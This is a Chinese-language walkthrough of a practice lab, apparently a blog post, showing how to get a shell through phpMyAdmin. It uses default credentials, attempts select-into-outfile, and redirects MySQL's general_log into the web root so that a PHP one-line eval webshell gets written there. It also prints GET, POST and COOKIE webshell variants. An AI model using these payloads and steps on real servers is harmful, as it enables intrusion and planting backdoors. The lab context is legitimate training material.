红日靶场----(三)漏洞利用

上期已经信息收集阶段已经完成,接下来是漏洞利用。

靶场思路

通过信息收集得到两个吧靶场的思路

1、http://192.168.195.33/phpmyadmin/(数据库的管理界面)

root/root

2、http://192.168.195.33/yxcms/index.php?r=admin/index/login(CMS的管理后台)

admin/123456

登录页面和用户名都有了

我们第一个思路通过phpmyadmin写入一句话木马

漏洞利用

首先登录到phpmyadmin界面

在数据库旁边的SQL选项卡中是可以执行SQL语句的。

外观设置中默认是英文,我们可以选择改成简体中文。

我们点击SQL,检查是否可以正常执行SQL语句。

发现这里可以正常执行SQL语句,可以不加分号;每执行一条命令记得要清除一下,不然会报错,因为它无法执行两条SQL语句。

复制代码
select version();    //查询数据库的版本信息

phpmyadmin GetSHELL姿势大全

方法1:使用select into outfile写入shell

前提:需要知道网站目录的绝对路径

不足:常因为权限设置的问题容易失败

这里我们是知道网站的根目录的,肯定有人会问真实环境下怎么知道网站的根目录啊,真实环境之下我们使用目录枚举进行爆破,或者来自站长的工作失误导致留下了网站的备份文件,真实环境下思路很多。

我们写入一句话木马

报错了,原来是因为权限的问题,看来开这方法行不通,那我们换一个。

这里的<?php eval ($_POST[cmd]);?>,是一句话木马

什么是一句话木马? 一句话木马是一般是指一段短小精悍的恶意代码,这段代码可以用作一个代理来执行攻击者发送过来的任意指令,因其体积小、隐蔽性强、功能强大等特点,被广泛应用于渗透过程中。

我们将一句话木马写入网站,形成了WebShell。

什么是WebShell?WebShell 就是以 ASP、 PHP、 JSP 或者 CGI 等网页文件形式的一种命令执行环境,也可以将其称做是一种网页后门。

PHP木马

客户端向服务端传递参数有三种方式:GET、POST、COOKIE。

一句话木马-webshell.php举例

复制代码
<?php @eval($_GET['cmd']);?>

<?php @eval($_POST['cmd']);?>

<?php assert($_COOKIE['cmd']);?>

基本的PHP用法

PHP 脚本以 <?php 开始,以 ?> 结束

复制代码
<?php
//php代码
?>

方法二:利用日志GET SHELL

既然权限不够无法执行我们的SQL语句,那我们就换一种方法。

利用日志的方法

mysql 5.0版本以上会创建日志文件,可以通过修改日志的全局变量get shell。

查看日志文件的位置:

复制代码
SHOW VARIABLES LIKE "%general%"

我们看到默认日志文件是没有开启的,我们知道了日志文件的位置。

那我们下一步就这个日志文件开启,并且重新指定位置。

首先把日志文件打开

然后我们重新指定一下日志文件,这个文件是指定之后自动创建的。

复制代码
SET GLOBAL general_log='on';  //开启general_log
SET GLOBAL general_log_file='c:/phpStudy/www/webshell.php';  //自定义日志文件

我们在检查一下这个日志文件是否打开了,并且重新指定文件位置了。

复制代码
SHOW VARIABLES LIKE "%general%"

现在我们看到这个日志文件已经处于打开状态,并且一直重新指定了位置。

我们打开Web主机看一下这个日志文件:

我们看到这已经变成了一个日志文件,我们执行一句话木马:

ok了我们直接写入成功。

复制代码
select '<?php eval ($_POST["cmd"]);?>'

下面我们直接使用WebShell集成工具直接连接就可以了

WebShell集成工具有很多:

中国菜刀、蚁剑、冰蝎、哥斯拉

相关推荐
DevSecOps选型指南7 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化7 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
恰薯条的屑海鸥7 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
阿部多瑞 ABU8 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
moongoblin11 小时前
行业赋能篇-2-能源行业安全运维升级
运维·安全·协作
Fortinet_CHINA11 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
网络·安全
这儿有一堆花12 小时前
安全访问家中 Linux 服务器的远程方案 —— 专为单用户场景设计
linux·服务器·安全
饮长安千年月15 小时前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
大咖分享课16 小时前
容器安全最佳实践:云原生环境下的零信任架构实施
安全·云原生·架构
淡水猫.17 小时前
ApacheSuperset CVE-2023-27524
安全·web安全